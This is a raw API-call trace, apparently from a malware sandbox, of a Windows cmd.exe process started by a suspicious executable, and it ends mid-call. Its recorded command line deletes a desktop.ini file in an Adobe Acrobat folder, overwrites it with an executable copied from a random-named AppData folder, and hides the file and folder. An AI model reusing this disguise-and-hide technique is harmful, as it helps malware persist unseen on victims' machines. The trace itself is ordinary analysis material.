lpSystemTimeAsFileTime=0x26f8ac*(dwLowDateTime=0x910ce8a0, dwHighDateTime=0x1d440a9)) [0146.155] GetCurrentProcessId () returned 0xac8 [0146.155] GetCurrentThreadId () returned 0xa94 [0146.155] GetTickCount () returned 0x2d7d7 [0146.155] QueryPerformanceCounter (in: lpPerformanceCount=0x26f8a4 | out: lpPerformanceCount=0x26f8a4*=20294414292) returned 1 [0146.156] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0146.156] __set_app_type (_Type=0x1) [0146.156] __p__fmode () returned 0x76b331f4 [0146.156] __p__commode () returned 0x76b331fc [0146.156] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0146.156] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0146.156] GetCurrentThreadId () returned 0xa94 [0146.156] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa94) returned 0x38 [0146.156] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.156] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.156] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.157] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.157] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f83c | out: phkResult=0x26f83c*=0x0) returned 0x2 [0146.157] VirtualQuery (in: lpAddress=0x26f873, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.157] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.157] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.157] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.157] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f80c, dwLength=0x1c | out: lpBuffer=0x26f80c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0146.157] GetConsoleOutputCP () returned 0x1b5 [0146.157] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.157] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.157] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.157] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.158] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.158] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.158] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.158] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.158] GetEnvironmentStringsW () returned 0x4205d0* [0146.158] FreeEnvironmentStringsW (penv=0x4205d0) returned 1 [0146.159] GetEnvironmentStringsW () returned 0x4205d0* [0146.159] FreeEnvironmentStringsW (penv=0x4205d0) returned 1 [0146.159] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7ac | out: phkResult=0x26e7ac*=0x40) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x80, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x1, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x1, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x0, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x40, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x40, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x40, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegCloseKey (hKey=0x40) returned 0x0 [0146.159] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e7ac | out: phkResult=0x26e7ac*=0x40) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x40, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x1, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x1, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x0, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.159] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x9, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.160] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x4, lpData=0x26e7b8*=0x9, lpcbData=0x26e7b0*=0x4) returned 0x0 [0146.160] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e7b4, lpData=0x26e7b8, lpcbData=0x26e7b0*=0x1000 | out: lpType=0x26e7b4*=0x0, lpData=0x26e7b8*=0x9, lpcbData=0x26e7b0*=0x1000) returned 0x2 [0146.160] RegCloseKey (hKey=0x40) returned 0x0 [0146.160] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886374 [0146.160] srand (_Seed=0x5b886374) [0146.160] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"" [0146.160] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"" [0146.160] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.160] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x421d30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.160] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.160] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.161] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.161] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.161] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.161] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.161] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.161] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.161] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.161] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.161] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.161] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.161] GetEnvironmentStringsW () returned 0x422720* [0146.161] FreeEnvironmentStringsW (penv=0x422720) returned 1 [0146.161] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.161] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.161] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.161] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.161] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.161] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0146.161] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.161] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.161] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.161] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f578 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.162] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f578, lpFilePart=0x26f574 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f574*="Desktop") returned 0x18 [0146.162] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.162] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f2f4 | out: lpFindFileData=0x26f2f4) returned 0x420db0 [0146.162] FindClose (in: hFindFile=0x420db0 | out: hFindFile=0x420db0) returned 1 [0146.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f2f4 | out: lpFindFileData=0x26f2f4) returned 0x420db0 [0146.162] FindClose (in: hFindFile=0x420db0 | out: hFindFile=0x420db0) returned 1 [0146.162] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f2f4 | out: lpFindFileData=0x26f2f4) returned 0x420db0 [0146.162] FindClose (in: hFindFile=0x420db0 | out: hFindFile=0x420db0) returned 1 [0146.162] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.163] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.163] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0146.163] GetEnvironmentStringsW () returned 0x4205d0* [0146.163] FreeEnvironmentStringsW (penv=0x4205d0) returned 1 [0146.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.163] GetConsoleOutputCP () returned 0x1b5 [0146.163] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.164] GetUserDefaultLCID () returned 0x409 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f6b8, cchData=128 | out: lpLCData="0") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f6b8, cchData=128 | out: lpLCData="0") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f6b8, cchData=128 | out: lpLCData="1") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.164] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.165] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0146.165] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.166] GetConsoleTitleW (in: lpConsoleTitle=0x410b90, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.166] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.166] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.166] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.166] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.167] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0146.167] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0146.167] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0146.167] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0146.167] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0146.167] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0146.167] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0146.170] _wcsicmp (_String1="del", _String2=")") returned 59 [0146.170] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0146.170] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0146.170] _wcsicmp (_String1="IF", _String2="del") returned 5 [0146.170] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0146.170] _wcsicmp (_String1="REM", _String2="del") returned 14 [0146.170] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0146.173] _wcsicmp (_String1="type", _String2=")") returned 75 [0146.173] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0146.173] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0146.173] _wcsicmp (_String1="IF", _String2="type") returned -11 [0146.173] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0146.173] _wcsicmp (_String1="REM", _String2="type") returned -2 [0146.173] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0146.340] SetErrorMode (uMode=0x0) returned 0x0 [0146.340] SetErrorMode (uMode=0x1) returned 0x0 [0146.340] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4207f0, lpFilePart=0x26ee6c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26ee6c*="Desktop") returned 0x18 [0146.340] SetErrorMode (uMode=0x0) returned 0x1 [0146.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.341] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0146.346] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.347] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0xffffffff [0146.347] GetLastError () returned 0x2 [0146.348] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0xffffffff [0146.348] GetLastError () returned 0x2 [0146.348] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0x4209c8 [0146.348] FindClose (in: hFindFile=0x4209c8 | out: hFindFile=0x4209c8) returned 1 [0146.348] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0xffffffff [0146.348] GetLastError () returned 0x2 [0146.348] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x26ebe8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ebe8) returned 0x4209c8 [0146.349] FindClose (in: hFindFile=0x4209c8 | out: hFindFile=0x4209c8) returned 1 [0146.349] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0146.349] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0146.349] GetConsoleTitleW (in: lpConsoleTitle=0x26f0e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.349] InitializeProcThreadAttributeList (in: lpAttributeList=0x26ef68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f030 | out: lpAttributeList=0x26ef68, lpSize=0x26f030) returned 1 [0146.349] UpdateProcThreadAttribute (in: lpAttributeList=0x26ef68, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f028, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26ef68, lpPreviousValue=0x0) returned 1 [0146.349] GetStartupInfoW (in: lpStartupInfo=0x26ef24 | out: lpStartupInfo=0x26ef24*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0146.349] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0146.351] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26efc4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f010 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" ", lpProcessInformation=0x26f010*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa68, dwThreadId=0xa58)) returned 1 [0146.426] CloseHandle (hObject=0x4c) returned 1 [0146.426] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0146.426] GetEnvironmentStringsW () returned 0x420c58* [0146.426] FreeEnvironmentStringsW (penv=0x420c58) returned 1 [0146.426] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0146.583] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26ef04 | out: lpExitCode=0x26ef04*=0x0) returned 1 [0146.583] CloseHandle (hObject=0x50) returned 1 [0146.583] _vsnwprintf (in: _Buffer=0x26f04c, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ef10 | out: _Buffer="00000000") returned 8 [0146.583] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0146.583] GetEnvironmentStringsW () returned 0x422708* [0146.583] FreeEnvironmentStringsW (penv=0x422708) returned 1 [0146.583] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0146.583] GetEnvironmentStringsW () returned 0x422708* [0146.583] FreeEnvironmentStringsW (penv=0x422708) returned 1 [0146.584] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef68 | out: lpAttributeList=0x26ef68) [0146.584] GetConsoleTitleW (in: lpConsoleTitle=0x26f2e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.584] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e360, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x26e364, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e360*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0146.584] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0146.584] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0146.585] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0146.585] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\desktop.ini")) returned 0xffffffff [0146.585] GetLastError () returned 0x2 [0146.585] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security")) returned 0x2010 [0146.585] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0146.585] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0146.585] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\desktop.ini")) returned 0xffffffff [0146.585] GetLastError () returned 0x2 [0146.585] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x423894, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x423894) returned 0xffffffff [0146.585] GetLastError () returned 0x2 [0146.585] _get_osfhandle (_FileHandle=2) returned 0xb [0146.585] GetFileType (hFile=0xb) returned 0x2 [0146.585] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0146.585] GetConsoleMode (in: 